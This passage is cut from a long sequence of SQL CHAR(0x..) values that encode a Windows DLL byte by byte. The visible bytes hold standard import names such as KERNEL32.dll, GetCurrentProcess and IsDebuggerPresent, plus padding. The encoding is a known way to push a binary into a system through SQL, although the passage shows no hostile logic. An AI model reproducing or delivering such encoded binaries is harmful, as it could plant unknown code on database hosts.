AR(0x6c),CHAR(0x65),CHAR(0x64),CHAR(0x45),CHAR(0x78),CHAR(0x63),CHAR(0x65),CHAR(0x70),CHAR(0x74),CHAR(0x69),CHAR(0x6f),CHAR(0x6e),CHAR(0x46),CHAR(0x69),CHAR(0x6c),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x1d),CHAR(0x02),CHAR(0x47),CHAR(0x65),CHAR(0x74),CHAR(0x43),CHAR(0x75),CHAR(0x72),CHAR(0x72),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x50),CHAR(0x72),CHAR(0x6f),CHAR(0x63),CHAR(0x65),CHAR(0x73),CHAR(0x73),CHAR(0x00),CHAR(0x9a),CHAR(0x05),CHAR(0x54),CHAR(0x65),CHAR(0x72),CHAR(0x6d),CHAR(0x69),CHAR(0x6e),CHAR(0x61),CHAR(0x74),CHAR(0x65),CHAR(0x50),CHAR(0x72),CHAR(0x6f),CHAR(0x63),CHAR(0x65),CHAR(0x73),CHAR(0x73),CHAR(0x00),CHAR(0x00),CHAR(0x89),CHAR(0x03),CHAR(0x49),CHAR(0x73),CHAR(0x50),CHAR(0x72),CHAR(0x6f),CHAR(0x63),CHAR(0x65),CHAR(0x73),CHAR(0x73),CHAR(0x6f),CHAR(0x72),CHAR(0x46),CHAR(0x65),CHAR(0x61),CHAR(0x74),CHAR(0x75),CHAR(0x72),CHAR(0x65),CHAR(0x50),CHAR(0x72),CHAR(0x65),CHAR(0x73),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x00),CHAR(0x50),CHAR(0x04),CHAR(0x51),CHAR(0x75),CHAR(0x65),CHAR(0x72),CHAR(0x79),CHAR(0x50),CHAR(0x65),CHAR(0x72),CHAR(0x66),CHAR(0x6f),CHAR(0x72),CHAR(0x6d),CHAR(0x61),CHAR(0x6e),CHAR(0x63),CHAR(0x65),CHAR(0x43),CHAR(0x6f),CHAR(0x75),CHAR(0x6e),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x1e),CHAR(0x02),CHAR(0x47),CHAR(0x65),CHAR(0x74),CHAR(0x43),CHAR(0x75),CHAR(0x72),CHAR(0x72),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x50),CHAR(0x72),CHAR(0x6f),CHAR(0x63),CHAR(0x65),CHAR(0x73),CHAR(0x73),CHAR(0x49),CHAR(0x64),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x02),CHAR(0x47),CHAR(0x65),CHAR(0x74),CHAR(0x43),CHAR(0x75),CHAR(0x72),CHAR(0x72),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x54),CHAR(0x68),CHAR(0x72),CHAR(0x65),CHAR(0x61),CHAR(0x64),CHAR(0x49),CHAR(0x64),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x02),CHAR(0x47),CHAR(0x65),CHAR(0x74),CHAR(0x53),CHAR(0x79),CHAR(0x73),CHAR(0x74),CHAR(0x65),CHAR(0x6d),CHAR(0x54),CHAR(0x69),CHAR(0x6d),CHAR(0x65),CHAR(0x41),CHAR(0x73),CHAR(0x46),CHAR(0x69),CHAR(0x6c),CHAR(0x65),CHAR(0x54),CHAR(0x69),CHAR(0x6d),CHAR(0x65),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x01),CHAR(0x44),CHAR(0x69),CHAR(0x73),CHAR(0x61),CHAR(0x62),CHAR(0x6c),CHAR(0x65),CHAR(0x54),CHAR(0x68),CHAR(0x72),CHAR(0x65),CHAR(0x61),CHAR(0x64),CHAR(0x4c),CHAR(0x69),CHAR(0x62),CHAR(0x72),CHAR(0x61),CHAR(0x72),CHAR(0x79),CHAR(0x43),CHAR(0x61),CHAR(0x6c),CHAR(0x6c),CHAR(0x73),CHAR(0x00),CHAR(0x6c),CHAR(0x03),CHAR(0x49),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x69),CHAR(0x61),CHAR(0x6c),CHAR(0x69),CHAR(0x7a),CHAR(0x65),CHAR(0x53),CHAR(0x4c),CHAR(0x69),CHAR(0x73),CHAR(0x74),CHAR(0x48),CHAR(0x65),CHAR(0x61),CHAR(0x64),CHAR(0x00),CHAR(0x82),CHAR(0x03),CHAR(0x49),CHAR(0x73),CHAR(0x44),CHAR(0x65),CHAR(0x62),CHAR(0x75),CHAR(0x67),CHAR(0x67),CHAR(0x65),CHAR(0x72),CHAR(0x50),CHAR(0x72),CHAR(0x65),CHAR(0x73),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x00),CHAR(0x4b),CHAR(0x45),CHAR(0x52),CHAR(0x4e),CHAR(0x45),CHAR(0x4c),CHAR(0x33),CHAR(0x32),CHAR(0x2e),CHAR(0x64),CHAR(0x6c),CHAR(0x6c),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x5f),CHAR(0x5f),CHAR(0x43),CHAR(0x5f),CHAR(0x73),CHAR(0x70),CHAR(0x65),CHAR(0x63),CHAR(0x69),CHAR(0x66),CHAR(0x69),CHAR(0x63),CHAR(0x5f),CHAR(0x68),CHAR(0x61),CHAR(0x6e),CHAR(0x64),CHAR(0x6c),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x00),CHAR(0x25),CHAR(0x00),CHAR(0x5f),CHAR(0x5f),CHAR(0x73),CHAR(0x74),CHAR(0x64),CHAR(0x5f),CHAR(0x74),CHAR(0x79),CHAR(0x70),CHAR(0x65),CHAR(0x5f),CHAR(0x69),CHAR(0x6e),CHAR(0x66),CHAR(0x6f),CHAR(0x5f),CHAR(0x64),CHAR(0x65),CHAR(0x73),CHAR(0x74),CHAR(0x72),CHAR(0x6f),CHAR(0x79),CHAR(0x5f),CHAR(0x6c),CHAR(0x69),CHAR(0x73),CHAR(0x74),CHAR(0x00),CHAR(0x00),CHAR(0x3e),CHAR(0x00),CHAR(0x6d),CHAR(0x65),CHAR(0x6d),CHAR(0x73),CHAR(0x65),CHAR(0x74),CHAR(0x00),CHAR(0x00),CHAR(0x56),CHAR(0x43),CHAR(0x52),CHAR(0x55),CHAR(0x4e),CHAR(0x54),CHAR(0x49),CHAR(0x4d),CHAR(0x45),CHAR(0x31),CHAR(0x34),CHAR(0x30),CHAR(0x2e),CHAR(0x64),CHAR(0x6c),CHAR(0x6c),CHAR(0x00),CHAR(0x00),CHAR(0x36),CHAR(0x00),CHAR(0x5f),CHAR(0x69),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x6d),CHAR(0x00),CHAR(0x37),CHAR(0x00),CHAR(0x5f),CHAR(0x69),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x6d),CHAR(0x5f),CHAR(0x65),CHAR(0x00),CHAR(0x3f),CHAR(0x00),CHAR(0x5f),CHAR(0x73),CHAR(0x65),CHAR(0x68),CHAR(0x5f),CHAR(0x66),CHAR(0x69),CHAR(0x6c),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x5f),CHAR(0x64),CHAR(0x6c),CHAR(0x6c),CHAR(0x00),CHAR(0x18),CHAR(0x00),CHAR(0x5f),CHAR(0x63),CHAR(0x6f),CHAR(0x6e),CHAR(0x66),CHAR(0x69),CHAR(0x67),CHAR(0x75),CHAR(0x72),CHAR(0x65),CHAR(0x5f),CHAR(0x6e),CHAR(0x61),CHAR(0x72),CHAR(0x72),CHAR(0x6f),CHAR(0x77),CHAR(0x5f),CHAR(0x61),CHAR(0x72),CHAR(0x67),CHAR(0x76),CHAR(0x00),CHAR(0x00),CHAR(0x33),CHAR(0x00),CHAR(0x5f),CHAR(0x69),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x69),CHAR(0x61),CHAR(0x6c),CHAR(0x69),CHAR(0x7a),CHAR(0x65),CHAR(0x5f),CHAR(0x6e),CHAR(0x61),CHAR(0x72),CHAR(0x72),CHAR(0x6f),CHAR(0x77),CHAR(0x5f),CHAR(0x65),CHAR(0x6e),CHAR(0x76),CHAR(0x69),CHAR(0x72),CHAR(0x6f),CHAR(0x6e),CHAR(0x6d),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x00),CHAR(0x00),CHAR(0x34),CHAR(0x00),CHAR(0x5f),CHAR(0x69),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x69),CHAR(0x61),CHAR(0x6c),CHAR(0x69),CHAR(0x7a),CHAR(0x65),CHAR(0x5f),CHAR(0x6f),CHAR(0x6e),CHAR(0x65),CHAR(0x78),CHAR(0x69),CHAR(0x74),CHAR(0x5f),CHAR(0x74),CHAR(0x61),CHAR(0x62),CHAR(0x6c),CHAR(0x65),CHAR(0x00),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x00),CHAR(0x5f),CHAR(0x65),CHAR(0x78),CHAR(0x65),CHAR(0x63),CHAR(0x75),CHAR(0x74),CHAR(0x65),CHAR(0x5f),CHAR(0x6f),CHAR(0x6e),CHAR(0x65),CHAR(0x78),CHAR(0x69),CHAR(0x74),CHAR(0x5f),CHAR(0x74),CHAR(0x61),CHAR(0x62),CHAR(0x6c),CHAR(0x65),CHAR(0x00),CHAR(0x16),CHAR(0x00),CHAR(0x5f),CHAR(0x63),CHAR(0x65),CHAR(0x78),CHAR(0x69),CHAR(0x74),CHAR(0x00),CHAR(0x00),CHAR(0x61),CHAR(0x70),CHAR(0x69),CHAR(0x2d),CHAR(0x6d),CHAR(0x73),CHAR(0x2d),CHAR(0x77),CHAR(0x69),CHAR(0x6e),CHAR(0x2d),CHAR(0x63),CHAR(0x72),CHAR(0x74),CHAR(0x2d),CHAR(0x72),CHAR(0x75),CHAR(0x6e),CHAR(0x74),CHAR(0x69),CHAR(0x6d),CHAR(0x65),CHAR(0x2d),CHAR(0x6c),CHAR(0x31),CHAR(0x2d),CHAR(0x31),CHAR(0x2d),CHAR(0x30),CHAR(0x2e),CHAR(0x64),CHAR(0x6c),CHAR(0x6c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xcd),CHAR(0x5d),CHAR(0x20),CHAR(0xd2),CHAR(0x66),CHAR(0xd4),CHAR(0xff),CHAR(0xff),CHAR(0x32),CHAR(0xa2),CHAR(0xdf),CHAR(0x2d),CHAR(0x99),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2f),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x2a),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x78),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x2c),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0xa7),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0xe1),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0xa8),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xe4),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x34),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x34),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x4a),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xac),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xd0),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xd0),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x03),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x41),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x74),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x78),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x39),CHAR(0x00),CHA